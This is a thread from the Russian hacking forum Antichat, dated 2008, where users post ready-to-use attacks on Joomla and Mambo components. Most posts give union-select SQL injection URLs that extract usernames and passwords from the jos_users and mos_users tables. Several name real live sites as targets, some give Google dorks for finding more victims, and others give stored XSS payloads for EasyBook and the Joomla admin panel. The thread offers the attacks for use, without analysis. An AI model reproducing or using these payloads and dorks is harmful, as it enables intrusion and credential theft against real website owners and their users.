Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

20.02.2008, 16:25
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме: 1373642
Репутация:
569
|
|
Кoмпoнeнт соm_рhilаfоrm
уязвимый параметр fоrm_id
но работает не везде,в чем причина не разобрался
пример уязвимого сайта:
код:
httр://www.nехtрrоm.ru/index.рhр?орtiоn=соm_рhilаfоrm&Itеmid=5 &fоrm_id=1+uniоn+sеlесt+1,2,version(),4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36#&Itemid=5
Последний раз редактировалось fobofob; 25.02.2008 в 18:42..
|
|
|

26.02.2008, 13:55
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме: 4038468
Репутация:
1224
|
|
Component EasyBook 1.1 Active XSS
inurl: index.php?option=com_easybook
Инъекция:
Код:
При добавлении сообщения уязвимо поле "Ваш сайт:/Your Homepage:". вписываем: http://www.com/" onmouseover=javascript:alert(/XSS/);> и добавляем сообщение.
Пример: http://demo.easy-joomla.org/index.php?option=com_easybook&Itemid=5
Никнейм Hi!, наводим курсор на ссылку
|
|
|

28.02.2008, 07:47
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме: 4038468
Репутация:
1224
|
|
Component Simpleboard 1.0.3 (catid) SQL Injection
inurl: index.php?option=com_simpleboard
Инъекция:
Код:
index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*
http://www.uvageneration.com/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*
(c) it's my, Scipio, xcedz http://milw0rm.com/exploits/5195
|
|
|

06.03.2008, 18:44
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме: 2634544
Репутация:
1559
|
|
Mambo Component com_Musica (id) Remote SQL Injection Vulnerability
SQL Injection
Код:
index.php?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+fro m%2F%2A%2A%2Fmos_users/*
milw0rm
|
|
|

10.03.2008, 20:24
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме: 2634544
Репутация:
1559
|
|
Mambo Component eWriting 1.2.1 (cat) SQL Injection Vulnerability
SQL Injection
Joomla!
Код:
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--
Mambo
Код:
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users--
milw0rm
|
|
|

11.03.2008, 19:26
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме: 2634544
Репутация:
1559
|
|
Joomla Component ProductShowcase <= 1.5 SQL Injection Vulnerability
SQL Injection
Код:
index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
milw0rm
|
|
|

16.03.2008, 00:10
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме: 6905523
Репутация:
1174
|
|
Joomla 1.5.1
Active XSS
Edit Your Details -> Your Name: [XSS]
XSS
(Права администратора)
Active:
Article: [ New ] -> Title: [XSS]
Passive:
Filter: [XSS]
Код:
/administrator/index.php?option=com_menus&task=view&menutype=[XSS]
ZAMUT (c)
Последний раз редактировалось ZAMUT; 16.03.2008 в 00:38..
|
|
|

18.03.2008, 21:17
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме: 4192567
Репутация:
2145
|
|
Joomla components com_guide "category" Remote SQL Injection
PoC:
Код:
index.php?option=com_guide&category=-999999/**/union/**/select/**/0,username,
password,3,4,5,6,7,8/**/from/**/jos_users/*
© The-0utl4w
|
|
|

20.03.2008, 21:41
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме: 2634544
Репутация:
1559
|
|
Joomla Component Datsogallery 1.3.1 Remote SQL Injection Vulnerability
SQL Injection
index.php?option=com_datsogallery&func=detail&id=' Sql
Код:
union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8,9,0,1,2,3,4,5+from+jos_users/*
milw0rm
|
|
|

28.03.2008, 16:05
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме: 2634544
Репутация:
1559
|
|
Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability
SQL Injection
http://[target]/index.php?option=com_myalbum&album= [SQL]
Код:
-1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*
Joomla Component alphacontent <= 2.5.8 (id) SQL Injection Vulnerability
SQL Injection
Код:
index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*
DORK:
inurl: "com_alphacontent"
"AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr"
milw0rm
Последний раз редактировалось ~!DoK_tOR!~; 28.03.2008 в 18:27..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|